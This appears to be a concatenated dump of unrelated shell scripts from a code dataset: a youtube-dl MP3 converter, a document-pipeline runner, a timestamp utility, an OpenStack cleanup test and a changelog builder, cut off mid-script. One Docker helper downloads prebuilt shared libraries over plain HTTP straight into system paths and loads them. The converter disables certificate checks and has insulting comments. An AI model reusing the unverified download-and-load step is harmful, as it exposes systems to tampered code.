Example usage:
Long: y2m -t "Rick Astley - Never Gonna Give You Up" -s /dev/null -v http://www.youtube.com/watch?v=oHg5SJYRHA0"
Short: y2m http://www.youtube.com/watch?v=oHg5SJYRHA0 ## just pirate the fucking thing already...
'
}
## following requires modern GNU bash 3.2 you loser....
if (shopt -s nocasematch ; [[ ${1} = @(-h|--help) ]]) ; then
print_usage ; exit 1
## because you're a lazy cunt...
elif [[ "${1}" =~ $isurl ]] ; then
video="${1}"
else
while [[ $# -gt 0 ]]; do
opt="${1}" ; shift ;
## no one likes a smart-ass....
current_arg="${1}"
# Broken, needs to detect opt args and current_arg
# [[ -z "${opt}" ]] || [[ "${current_arg}" =~ ^-{0,1}.* ]] && {
# echo -e "[fatal] The Universe doesn't give a fuck about your feelings..."
# exit 6
# }
case "${opt}" in
"-t"|"--title" ) title="${1}" ; shift ;;
"-v"|"--video" ) video="${1}" ; shift ;;
"-c"|"--cover" ) cover="${1}" ; shift ;;
"-s"|"--save" ) save="${1}" ; shift ;;
## version out...
"-v"|"--version" ) echo -e "[info] Current verion is ${VER}"
exit 1
;;
## advanced flags, buyer beware...
"--debug" ) echo -e "[warn] Activating sketchy dumping..."
debug='--verbose --print-traffic --dump-pages'
shift
;;
"--flush" ) echo -e "[info] Flushing caches..."
youtube-dl --no-check-certificate --rm-cache-dir
exit 1
;;
"--update" ) echo -e "[info] Force updating youtube-dl..."
sudo youtube-dl -U
exit 1
;;
## you sir, just boiled the fuckin ocean..
* ) echo -e "[fatal] Invalid option: \""$opt"\"" >&2
return 6
;;
esac
done
fi
## unset usage from global scope
unset -f print_usage
## make a temporary directory and move into it....
tmp_dir=$(mktemp -d -t y2m-XXXXXXXXXX) \
&& cd "${tmp_dir}"
echo -e "[info] Temporary directory is: ${tmp_dir}"
## TODO: implement for stripping / quoting
function ere_quote () {
sed 's/[]\.|$(){}?+*^]/\\&/g' <<< "$*"
}
## if short order (y2m http://addy.com)
[ "x${video}" == "x" ] && { video=${1} ; }
[ "x${save}" == "x" ] && { save="/Users/${USER}/Music/" ; }
## save location exists?
[ ! -d "${save}" ] && {
echo -e "[fatal] Directory '${save}' does not not exist..."
return 9
}
echo -e "[info] Using directory: ${save}"
regex='v=(.*)'
[[ ${video} =~ ${regex} ]] && {
## argsmap
video_id="${BASH_REMATCH[1]}"
video_id="$(echo ${video_id}| cut -d'&' -f1)"
## set comments
declare COMMENTS="
[CPR] ${CPR}
[MOD] ${MOD}
[VER] Y2: ${VER}
[REF] YT: ${video_id}
"
## remove thumb if exists
[ -f 'thumbnail.jpg' ] && {
rm -f 'thumbnail.jpg'
}
## get/set thumbnail for MP3
if [[ "x${cover}" == "x" && ! -f "${cover}" ]] ; then
echo -e "[info] Downloading thumbnail"
youtube-dl --no-check-certificate ${debug} --no-warnings --write-thumbnail ${video} -o thumbnail.jpg
else
echo -e "[info] Using ${cover} as thumbail"
cp -ri "${cover}" thumbnail.jpg
fi
## if you haven't defined a title....
[ "x${title}" == "x" ] && {
title="$(youtube-dl --no-check-certificate ${debug} --no-warnings --get-title ${video} |sed s/://g)"
}
echo -e "[info] Title is: ${title}"
## download the FLV stream
youtube-dl --no-check-certificate ${debug} --no-warnings -o "${title}" ${video}
artist="$(echo ${title} |awk -F ' - ' '{print$1}' |sed -e 's/\[.*//g' -e 's/ */ /g' -e 's/^ *\(.*\) *$/\1/')"
song="$(echo ${title} |awk -F ' - ' '{print$2}' |sed -e 's/\[.*//g' -e 's/ */ /g' -e 's/^ *\(.*\) *$/\1/')"
## format independant, might need: head -n1, also hates ( ) [ ] etc
video=$(ls |grep "${artist}")
echo -e "[info] Using Video: ${video}"
## REQ: FFMPEG proper installers via
## https://github.com/Gabelbombe/Bash-Tools/tree/master/STANDUP
ffmpeg -i "${video}" \
-acodec libmp3lame \
-ab 320k \
-ac 2 \
-vn \
-y "${title}.mp3"
## add ${save} with LAME since FFMPEG changes too much....
lame --preset insane -V0 --id3v2-only --ignore-tag-errors \
--ti 'thumbnail.jpg' \
--ta "${artist}" \
--tt "${song}" \
--tv "TPE2=${artist}" \
--tc "${COMMENTS}" \
"${title}.mp3" "${save}/${title}.mp3"
rm -fr "${tmp_dir}" ## oikology...
} || {
echo -e "[fatal] The Universe doesn't give a fuck about your feelings..."
}
| true |
e8063c43b7f3dd5f1362a47517e9dacdec1b13ae | Shell | ivanvladimir/conectividad_old | /execute.sh | UTF-8 | 8,344 | 3.921875 | 4 | [] | no_license | #! /bin/bash
# autor: @Penserbjorne - Sebastian Aguilar
# FI-IIMAS-IIJ-UNAM
# Modification: @ivanvladimir - Ivan Meza
opt=-1
# Define a timestamp function
timestamp() {
date +"%T"
}
help(){
echo "
ONE SCRIPT TO RULE THEM ALL!!!
Descripción: Script útilizado para automátizar la ejecución y despliegue del sistema.
h) Help
i) Initialize (install dependencies and create environment)
d) Download data
t) Extract text
m) Annotated documents
a) Extract articles
p) Push to production
r) Remove data
z) Execute all process
e) Exit
Uso: ./execute.sh [hidtmaprze]"
exit
}
menu(){
echo -n "
ONE SCRIPT TO RULE THEM ALL!!!
Select an option.
i) Initialize (install dependencies and create environment)
d) Download data
t) Extract text
m) Annotated documents
a) Extract articles
p) Push to production
r) Remove data
z) Execute all process
e) Exit
Option: "
read opt
}
menuOption(){
if [ "$opt" = "i" ] || [ "$opt" = "I" ]; then
initialize
elif [ "$opt" = "d" ] || [ "$opt" = "D" ]; then
downloadData
elif [ "$opt" = "t" ] || [ "$opt" = "T" ]; then
extractText
elif [ "$opt" = "m" ] || [ "$opt" = "M" ]; then
annotatedDocuments
elif [ "$opt" = "a" ] || [ "$opt" = "A" ]; then
extractArticles
# elif [ "$opt" = "s" ] || [ "$opt" = "S" ]; then
# basicStatistics
elif [ "$opt" = "p" ] || [ "$opt" = "P" ]; then
pushToProduction
elif [ "$opt" = "r" ] || [ "$opt" = "R" ]; then
removeData
elif [ "$opt" = "h" ] || [ "$opt" = "H" ]; then
help
elif [ "$opt" = "z" ] || [ "$opt" = "Z" ]; then
removeData
initialize
downloadData
extractText
annotatedDocuments
extractArticles
# basicStatistics
pushToProduction
exit
elif [ "$opt" = "e" ] || [ "$opt" = "E" ]; then
echo " See you!"
exit
else
echo " Error: Nope, I don't know what do you want :/ Sorry!"
fi
}
initialize(){
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
echo $(timestamp) " > virtualenv -p /usr/bin/python3 env"
virtualenv -p /usr/bin/python3 env
echo $(timestamp) " > source ./env/bin/activate"
source ./env/bin/activate
echo $(timestamp) " > pip install -r requirements.txt"
pip3 install -r requirements.txt
#echo $(timestamp) " > python3 -m nltk.downloader all"
#python3 -m nltk.downloader stopwords
echo $(timestamp) " > deactivate"
deactivate
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
}
downloadData(){
if [ -d "./env" ]; then
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
mkdir data/contenciosos/text
echo $(timestamp) " > source ./env/bin/activate"
source ./env/bin/activate
echo $(timestamp) " > src/python/download_casos_contenciosos.py"
python3 ./src/python/download_casos_contenciosos.py -v
echo $(timestamp) " > deactivate"
deactivate
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
else
echo " Theres no enviroment! Please \"Initialize\""
fi
}
extractText(){
if [ -d "./env" ]; then
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
echo $(timestamp) " > source ./env/bin/activate"
source ./env/bin/activate
echo $(timestamp) " > src/python/extract_text.py"
python3 src/python/extract_text.py -v
echo $(timestamp) " > module_canonical_name.py"
python3 src/python/module_canonical_name.py -v
echo $(timestamp) " > deactivate"
deactivate
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
else
echo " Theres no enviroment! Please \"Initialize\""
fi
}
annotatedDocuments(){
if [ -d "./env" ]; then
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
if [ ! -d "./data/AnnotatedDocuments" ]; then
echo $(timestamp) " > mkdir ./data/AnnotatedDocuments"
mkdir ./data/annotatedDocuments
fi
echo $(timestamp) " > cd gate/Java/"
cd gate/Java/
echo $(timestamp) " > ./compile_run_embedded.sh"
./compile_run_embedded.sh
echo $(timestamp) " > cd ./../../"
cd ./../../
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
else
echo " Theres no enviroment! Please \"Initialize\""
fi
}
extractArticles(){
if [ -d "./env" ]; then
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
echo $(timestamp) " > source ./env/bin/activate"
source ./env/bin/activate
echo $(timestamp) " > src/python/label_articles.py"
python3 src/python/label_articles.py -v
echo $(timestamp) " > deactivate"
deactivate
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
else
echo " Theres no enviroment! Please \"Initialize\""
fi
}
basicStatistics(){
if [ -d "./env" ]; then
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
echo $(timestamp) " > source ./env/bin/activate"
source ./env/bin/activate
echo $(timestamp) " > basic_statistics.py"
python3 basic_statistics.py -v
echo $(timestamp) " > deactivate"
deactivate
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
else
echo " Theres no enviroment! Please \"Initialize\""
fi
}
pushToProduction(){
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
echo $(timestamp) " > cd ./../../webapp/"
cd ./../../webapp/
echo $(timestamp) " > cp -r ./../src/python/data/DB.json ./DB.json"
cp -r ./../src/python/data/DB.json ./DB.json
echo $(timestamp) " > cp -r ./../src/python/data/annotatedDocuments ./annotatedDocuments"
cp -r ./../src/python/data/annotatedDocuments ./annotatedDocuments
echo $(timestamp) " > cp -r ./../src/python/data/contenciosos ./contenciosos"
cp -r ./../src/python/data/contenciosos ./contenciosos
echo $(timestamp) " > cp -r ./../src/python/data/graph.json ./graph.json"
cp -r ./../src/python/data/graph.json ./graph.json
echo $(timestamp) " > cd ./../src/python/ "
cd ./../src/python/
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
}
removeData(){
echo -n "
This going to remove all data from local enviroment (data folder, DB.json, annotatedDocuments and graph.json)
Continue? y/n: "
read opt
if [ "$opt" = "y" ] || [ "$opt" = "Y" ]; then
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
echo $(timestamp) " > rm -rf ./data"
rm -rf ./data
# echo $(timestamp) " > rm -rf ./../../webapp/DB.json"
# rm -rf ./../../webapp/DB.json
# echo $(timestamp) " > rm -rf ./../../webapp/annotatedDocuments"
# rm -rf ./../../webapp/annotatedDocuments
# echo $(timestamp) " > rm -rf ./../../webapp/project/client/static/graph.json"
# rm -rf ./../../webapp/project/client/static/graph.json
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
else
echo " Ok, dont worry, sometimes is ... is ... is just fine to don't erase the old moments :)"
fi
}
echo $(timestamp) " > ulimit -m 2097152 => Max. 2 GB"
#echo $(timestamp) " > ulimit -m 7340032 => Max. 7 GB"
ulimit -m 2097152
#ulimit -m 7340032
count=0
for var in "$@"
do
(( count++ ))
(( accum += ${#var} ))
opt=$var
menuOption
done
# Hubo comandos, salimos ;@
if [ "$opt" != "-1" ]; then
exit
fi
echo "ONE SCRIPT TO RULE THEM ALL!!!"
echo "Es necesario instalar tkinter para python3 por separado."
echo "En Arch es sudo pacman -S tk"
echo "Es necesario intalar virtualenv por separado."
echo "En Arch es sudo pacman -S python-virtualenv"
echo
while [ "$opt" != "e" ] || [ "$opt" != "E" ] ; do
menu
menuOption
done
| true |
c9b32e170a2b1b99a02bc2f79e442a2d22f1604a | Shell | LeoDaza7/NFS-Cluster | /log_script.sh | UTF-8 | 196 | 2.875 | 3 | [] | no_license | #!/bin/bash
echo "writing data to $1/$(hostname)-$(hostname -I | awk '{print $1}').log..."
while true
do
echo $(date) >> $1/$(hostname)-$(hostname -I | awk '{print $1}').log
sleep 5
done
| true |
66ab2c79e15ec351b2464852983a000c88fa9472 | Shell | suriya/dot-files | /bin/run-if-needed | UTF-8 | 3,253 | 3.921875 | 4 | [] | no_license | #!/usr/bin/env bash
#
# $Id: run-if-needed 760 2007-03-19 15:45:14Z suriya $
#
# FILE: run-if-needed.sh
# AUTHOR: Suriya Subramanian <suriya@cs.utexas.edu>
# DATE: Sat Jun 12 16:28:54 CDT 2004
#
# Copyright (C) 2004 Suriya Subramanian <suriya@cs.utexas.edu>
# All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# =========================== =================================================
#
# This is used by me to run some command (for example, a fortune, reminding
# me of people's birthdays, etc) at login. But I dont want this command to
# run at every login. I dont need to be reminded of birthday's everytime I
# spawn a new console, right? What I want is to be reminded or shown a
# fortune, if I spawn a console after some hours. So, given a
# TIMESTAMPFILE, INTERVAL and a COMMAND to execute, executes the command if
# TIMESTAMPFILE has not been accessed in the past INTERVAL seconds. After
# executing the command, it touches TIMESTAMPFILE. An option "--force" is
# available to force execution of the command, eventhough it has been
# executed recently (within INTERVAL). In such a case INTERVAL should not
# be logically required, but this script is not yet smart enough to check
# for that
#
# Usage: run-if-needed.sh --timestamp hello.timestamp \
# --interval 3600 \
# --command echo "Hello World"
#
# Putting the above command into ~/.bashrc echoes "Hello World" whenever a
# new bash shell is created after an interval of an hour
#
function usage() {
echo "Usage: FIXME" >&2;
exit 1;
}
function process_cmdline() {
FORCE=0
while [ $# -ne 0 ]
do
case $1 in
--timestamp | -t)
shift
TIMESTAMPFILE=$1
shift
;;
--interval | -i)
shift
INTERVAL=$1
shift
;;
--command | -c)
shift
COMMANDFLAG=1
COMMAND=$@
# eliminate remaining arguments (since we have gobbled them
shift $#
;;
--force | -f)
shift
FORCE=1
;;
*)
echo "Warning: Ignoring commandline argument" $1 >&2
shift
;;
esac
done
}
function should_We_Run() {
[ ${FORCE} == 1 ] && return 0;
[ -a ${TIMESTAMPFILE} ] || return 0;
[ $((`date +%s` - `stat --format=%X ${TIMESTAMPFILE}`)) -gt ${INTERVAL} ];
}
function Run() {
${COMMAND} || exit 1;
touch ${TIMESTAMPFILE}
}
process_cmdline $@
# --timestamp file --interval 2342 --command grep -i suriya /etc/passwd
[ ${TIMESTAMPFILE} ] || { echo "TIMESTAMPFILE not specified" >&2; usage; }
[ ${INTERVAL} ] || { echo "INTERVAL not specified" >&2; usage; }
[ ${COMMANDFLAG} ] || { echo "COMMAND not specified" >&2; usage; }
should_We_Run && Run
exit 0
| true |
18536ed90ddad8a23c2d889ea6f0a7047b54e5b1 | Shell | HuangStomach/gini | /docker/pei/friso.bash | UTF-8 | 500 | 2.5625 | 3 | [
"MIT"
] | permissive | PHP_MODULE_PATH=php-$(echo "<?= PHP_MAJOR_VERSION.'.'.PHP_MINOR_VERSION ?>"|php7)
curl -sLo /usr/lib/libfriso.so "http://files.docker.genee.in/alpine/${PHP_MODULE_PATH}/libfriso.so" \
&& curl -sLo /usr/lib/php7/modules/friso.so "http://files.docker.genee.in/alpine/${PHP_MODULE_PATH}/friso.so" \
&& curl -sL http://files.docker.genee.in/friso-etc.tgz | tar -zxf - -C /etc \
&& printf "extension=friso.so\n\n[friso]\nfriso.ini_file=/etc/friso/friso.ini\n" > /etc/php7/conf.d/20_friso.ini
| true |
0f390c78774016a74a2ee052859e18f321d4bc91 | Shell | mgarciaisaia/shield-procer | /shield/core/mostrarAyuda.sh | UTF-8 | 1,126 | 3.65625 | 4 | [] | no_license | #!/bin/bash
#Pregunto si tiene parametros y si no muestro ayuda de todos los builtins
AYUDA="Brinda ayuda sobre el buit-in ingresado, de no ingresar ninguno, brinda ayuda de todos los built-ins"
INFOM="Muestra información sobre los módulos que contengan la cadena ingresada, de no ingresar ninguna cadena, muestra información sobre todos los módulos"
LISTAR="Lista el path absolutos de los modulos que tiene activos"
ACTUAL="Registra e inicializa los módulos del usuario"
MOSTRAR="Muestra el contenido de esa variable interna del shell"
SALIR="Termina la sesión actual"
APAGAR="Apaga el sistema"
if [ -z $1 ]
then
#mostrar ayuda de todos los buitins
echo "ayuda <buit-in> : " $AYUDA
echo "info_modulos <cadena> : " $INFOM
echo "listar_modulos : " $LISTAR
echo "actualizar_modulos : " $ACTUAL
echo "mostrar variable : " $MOSTRAR
echo "salir : " $SALIR
echo "apagar : " $APAGAR
else
case "$1" in
ayuda) echo $AYUDA
;;
info_modulos) echo $INFOM
;;
listar_modulos) echo $LISTAR
;;
actualizar_modulos) echo $ACTUAL
;;
mostrar) echo $MOSTRAR
;;
salir) echo $SALIR
;;
apagar) echo $APAGAR
;;
esac
fi
| true |
38c69577597a06d3341b53d48969130b2f101e50 | Shell | petronny/aur3-mirror | /ruby-text-hyphen/PKGBUILD | UTF-8 | 800 | 2.5625 | 3 | [] | no_license | # Maintainer: Francois Garillot <francois[@]garillot.net>
# Contributor: Daenyth <Daenyth+Arch [at] gmail [dot] com>
_gemname=text-hyphen
pkgname=ruby-$_gemname
pkgver=1.4.1
pkgrel=1
pkgdesc="Text::Hyphen is a Ruby library to hyphenate words in various languages using Ruby-fied versions of TeX hyphenation patterns"
arch=('any')
url="http://rubygems.org/gems/text-hyphen"
license=('GPL')
depends=('ruby')
makedepends=('rubygems')
source=(http://rubygems.org/downloads/$_gemname-$pkgver.gem)
noextract=($_gemname-$pkgver.gem)
md5sums=('e44f810d85b7ea4d568cd991af364bd9')
sha1sums=('ec45bc4b96a0b094158907a1f1daf638ef131669')
package() {
cd "$srcdir"
local _gemdir="$(ruby -e'puts Gem.default_dir')"
gem install --ignore-dependencies --no-user-install -i "$pkgdir$_gemdir" $_gemname-$pkgver.gem
}
# vim:set ts=2 sw=2 et:
| true |
e2fb2d6fda7009b67df29aff4ed4b1d167b7045c | Shell | syseleven/ospurge | /tools/func-tests.sh | UTF-8 | 5,230 | 3.421875 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Be strict (but not too much: '-u' doesn't always play nice with devstack)
set -eo pipefail
readonly PROGDIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
# Try to detect whether we run in the OpenStack Gate.
if [[ -d ~stack/devstack ]]; then
export DEVSTACK_DIR=~stack/devstack
GATE_RUN=1
else
export DEVSTACK_DIR=~/devstack
GATE_RUN=0
fi
#projectname_username
invisible_to_admin_demo_pass=$(cat $DEVSTACK_DIR/accrc/invisible_to_admin/demo | sed -nr 's/.*OS_PASSWORD="(.*)"/\1/p')
admin_admin_pass=$(cat $DEVSTACK_DIR/accrc/admin/admin | sed -nr 's/.*OS_PASSWORD="(.*)"/\1/p')
function assert_compute {
if [[ $(nova list | wc -l) -lt 5 ]]; then
echo "Less than one VM, someone cleaned our VM :("
exit 1
fi
}
function assert_network {
# We expect at least 1 "" (free), 1 "compute:",
# 1 "network:router_interface" and 1 "network:dhcp" ports
if [[ $(neutron port-list | wc -l) -lt 8 ]]; then
echo "Less than 4 ports, someone cleaned our ports :("
exit 1
fi
# We expect at least 2 security groups (default + one created by populate)
if [[ $(openstack security group list | wc -l) -lt 6 ]]; then
echo "Less than 2 security groups, someone cleaned our sec-groups :("
exit 1
fi
if [[ $(openstack floating ip list | wc -l) -lt 5 ]]; then
echo "Less than one floating ip, someone cleaned our FIP :("
exit 1
fi
}
function assert_volume {
if [[ ${GATE_RUN} == 1 ]]; then
# The Cinder backup service is enabled in the Gate.
if [[ $(openstack volume backup list | wc -l) -lt 5 ]]; then
echo "Less than one backup, someone cleaned our backup:("
exit 1
fi
else
if [[ $(openstack volume list | wc -l) -lt 5 ]]; then
echo "Less than one volume, someone cleaned our volume:("
exit 1
fi
fi
}
########################
### Pre check
########################
source $DEVSTACK_DIR/openrc admin admin
if [[ ! "$(openstack flavor list)" =~ 'm1.nano' ]]; then
openstack flavor create --id 42 --ram 64 --disk 1 --vcpus 1 m1.nano
fi
########################
### Populate
########################
pid=()
(source $DEVSTACK_DIR/openrc admin admin && ${PROGDIR}/populate.sh) &
pid+=($!)
(source $DEVSTACK_DIR/openrc demo demo && ${PROGDIR}/populate.sh) &
pid+=($!)
(source $DEVSTACK_DIR/openrc demo invisible_to_admin && ${PROGDIR}/populate.sh) &
pid+=($!)
#(source $DEVSTACK_DIR/openrc alt_demo alt_demo && ${PROGDIR}/populate.sh) &
#pid+=($!)
for i in ${!pid[@]}; do
wait ${pid[i]}
if [[ $? -ne 0 ]]; then
echo "One of the 'populate.sh' execution failed."
exit 1
fi
unset "pid[$i]"
done
########################
### Cleanup
########################
tox -e run -- --os-cloud devstack-admin --purge-own-project --verbose # purges admin/admin
source $DEVSTACK_DIR/openrc demo demo
assert_compute && assert_network && assert_volume
tox -e run -- --os-cloud devstack --purge-own-project --verbose # purges demo/demo
source $DEVSTACK_DIR/openrc demo invisible_to_admin
assert_compute && assert_network && assert_volume
tox -e run -- \
--os-auth-url http://localhost/identity \
--os-username demo --os-project-name invisible_to_admin \
--os-password $invisible_to_admin_demo_pass \
--os-domain-id=$OS_PROJECT_DOMAIN_ID \
--purge-own-project --verbose
#source $DEVSTACK_DIR/openrc alt_demo alt_demo
#assert_compute && assert_network && assert_volume
source $DEVSTACK_DIR/openrc admin admin
#openstack project set --disable alt_demo
#tox -e run -- --os-auth-url http://localhost/identity --os-username admin --os-project-name admin --os-password $admin_admin_pass --purge-project alt_demo --verbose
#openstack project set --enable alt_demo
########################
### Final assertion
########################
if [[ $(nova list --all-tenants --minimal | wc -l) -ne 4 ]]; then
echo "Not all VMs were cleaned up"
exit 1
fi
if [[ $(neutron port-list | wc -l) -ne 1 ]]; then # This also checks FIP
echo "Not all ports were cleaned up"
exit 1
fi
if [[ ${GATE_RUN} == 1 ]]; then
# The Cinder backup service is enabled in the Gate.
if [[ $(openstack volume backup list --all-projects | wc -l) -ne 1 ]]; then
echo "Not all volume backups were cleaned up"
exit 1
fi
else
if [[ $(openstack volume list --all-projects | wc -l) -ne 1 ]]; then
echo "Not all volumes were cleaned up"
exit 1
fi
fi
if [[ $(openstack zone list --all-projects | wc -l) -ne 1 ]]; then # This also checks FIP
echo "Not all zones were cleaned up"
exit 1
fi
| true |
52019e5c6da9047ed2356e9c1874a35234bdc884 | Shell | JuniorFreitas/dnlaravel | /start.sh | UTF-8 | 698 | 2.671875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
echo "\033[1;32mDocker com NGINX, Laravel, PHP7.2, Redis e MARIADB - Dynamus TI 2018 \033[0m"
echo Download Laravel
php ./docker/utils/composer create-project --prefer-dist laravel/laravel application
echo Copiando arquivo de configuração .env
cp ./docker/utils/.env ./application/.env
echo Copiando composer
mkdir ./application/bin
cp ./docker/utils/composer ./application/bin/composer
echo Instalando as dependencias
php ./application/bin/composer install
echo Generate key
cd application
php artisan key:generate
echo Startando containers
cd ..
docker-compose up -d
echo "\033[1;32mFim! Dúvidas consulte a documentação https://github.com/JuniorFreitas/dnlaravel \033[0m" | true |
767cebdfe391f85177fe12a40d7013c91ae029ab | Shell | giulianoc/CatraMMS | /scripts/examples/addSerieCChannels/foglio.sh | UTF-8 | 517 | 3.234375 | 3 | [] | no_license | #!/bin/bash
if [ $# -ne 4 ];
then
echo "Usage $0 <tsv path name> <userKey> <apiKey> <mmsAPIHostname> (i.e.: 40 702347803978348... mms-api.cloud-mms.com)"
exit 1
fi
tsvPathName=$1
#for seriec: 1
userKey=$2
#for seriec: 1j1f1C1f1l1e1r1u1w1y111f1r1p1b1b1V1H1S1b1b191418091909170916
apiKey=$3
#for seriec: mms-api.restream.ovh
mmsApiHostname=$4
awk -v userKey=$userKey -v apiKey=$apiKey -v mmsApiHostname=$mmsApiHostname -f ./utility/seriec.awk $tsvPathName
| true |
490c54975167db1e14e6d56ca09d322f6f93cfc3 | Shell | kubernetes-sigs/kustomize | /releasing/compile-changelog.sh | UTF-8 | 2,733 | 4.03125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Copyright 2022 The Kubernetes Authors.
# SPDX-License-Identifier: Apache-2.0
#
# Builds a PR-oriented changelog from the git history for the given module.
#
# Usage (from top of repo):
#
# releasing/compile-changelog.sh MODULE TAG CHANGE_LOG_FILE
#
# Where TAG is in the form
#
# api/v1.2.3
# kustomize/v1.2.3
# cmd/config/v1.2.3
# ... etc.
#
set -o errexit
set -o nounset
set -o pipefail
if [[ -z "${1-}" ]] || [[ -z "${2-}" ]]; then
echo "Usage: $0 <module> <fullTag> <changeLogFile>"
echo "Example: $0 kyaml kyaml/v0.13.4 changelog.txt"
exit 1
fi
module=$1
fullTag=$2
changeLogFile="${3:-}"
# Find previous tag that matches the tags module
allTags=$(git tag -l "$module*" --sort=-version:refname --no-contains="$fullTag")
prevTag=$(echo "$allTags" | head -n 1)
echo "Compiling $module changes from $prevTag to $fullTag"
commits=( $(git log "$prevTag".."$fullTag" \
--pretty=format:'%H' \
--abbrev-commit --no-decorate --no-color --no-merges \
-- "$module") )
echo "Gathering PRs for commits: ${commits[*]}"
# There is a 256 character limit on the query parameter for the GitHub API, so split into batches then deduplicate results
batchSize=5
results=""
for((i=0; i < ${#commits[@]}; i+=batchSize))
do
commitList=$(IFS="+"; echo "${commits[@]:i:batchSize}" | sed 's/ /+/g')
if [[ -z "${GITHUB_TOKEN-}" ]]; then
echo "WARNING: Please set GITHUB_TOKEN to avoid GitHub API rate limits."
if ! newResultsRaw=$(curl -sSL "https://api.github.com/search/issues?q=$commitList+repo%3Akubernetes-sigs%2Fkustomize+is:pull-request"); then
echo "Failed to fetch results for commits (exit code $?): $commitList"
exit 1
fi
else
if ! newResultsRaw=$(curl -sSL "https://api.github.com/search/issues?q=$commitList+repo%3Akubernetes-sigs%2Fkustomize+is:pull-request" -H "Authorization: Bearer $GITHUB_TOKEN"); then
echo "Failed to fetch results for commits (exit code $?): $commitList"
exit 1
fi
fi
if [[ "${newResultsRaw}" == *"API rate limit exceeded"* ]]; then
echo "GitHub API rate limit exceeded. Please set GITHUB_TOKEN to avoid this."
exit 1
fi
if [[ "${newResultsRaw}" == *"\"items\":"* ]] ; then
newResults=$(echo "$newResultsRaw" | jq -r '[ .items[] | { number, title } ]')
results=$(echo "$results" "$newResults" | jq -s '.[0] + .[1] | unique')
else
echo "Request for commits $commitList returned invalid results"
exit 1
fi
done
changelog=$(echo "${results}" | jq -r '.[] | select( .title | startswith("Back to development mode") | not) | "#\(.number): \(.title)" ')
if [[ -n "$changeLogFile" ]]; then
echo "$changelog" > "$changeLogFile"
else
echo
echo "----CHANGE LOG----"
echo "$changelog"
fi
| true |
e022a7e865a9f92848a0822aed42e577f928c5fa | Shell | zhangxin0518/linux-help | /linux-help.sh | UTF-8 | 1,246 | 2.671875 | 3 | [] | no_license | #!/bin/bash
#============================================================
#软件下载与安装源列表文件
sudo gedit /etc/apt/sources.list
#更新软件下载与安装源列表
sudo apt-get update
#按照源列表更新并安装软件
sudo apt-get upgrade
#强制安装Ubuntu软件中心
sudo apt-get install --reinstall software-center
#============================================================
#查看系统内核信息
uname -a
#查看电脑PCI设备信息
lspci
#查看USB设备
lsusb
#网络配置命令
ifconfig -a
sudo gedit /etc/network/interfaces
/etc/init.d/networking restart
sudo ifconfig eth0 down
sudo ifconfig eth0 up
#查看并设置PATH二进制文件包含路径信息
echo $PATH
在/etc/profile中加下面这个命令
export PATH=$PATH:/home/your_path
source /etc/profile
#Debian软件包管理.deb软件包
sudo dpkg -i #安装软件包
sudo dpkg -r #卸载软件包
#动态库寻找与配置路径的设置
cd /etc/ld.so.conf.d/
sudo gedit name.conf
sudo ldconfig
其中动态库缓存文件为: /etc/ld.so.cache
#修改电脑名字
sudo gedit /etc/hostname
sudo ./etc/hostname
#电脑网卡驱动路径与配置
sudo cp -i iwlwifi-9000-pu-b0-jf-b0-34.ucode /lib/firmware
sudo update-grub
sudo reboot
| true |
9cc12538238a306837d8e12da3d2d26399b3f263 | Shell | zackharley/CMPE327 | /test.sh | UTF-8 | 2,073 | 3.75 | 4 | [] | no_license | #!/usr/bin/env bash
POSITIONAL=()
while [[ $# -gt 0 ]]
do
key="$1"
case ${key} in
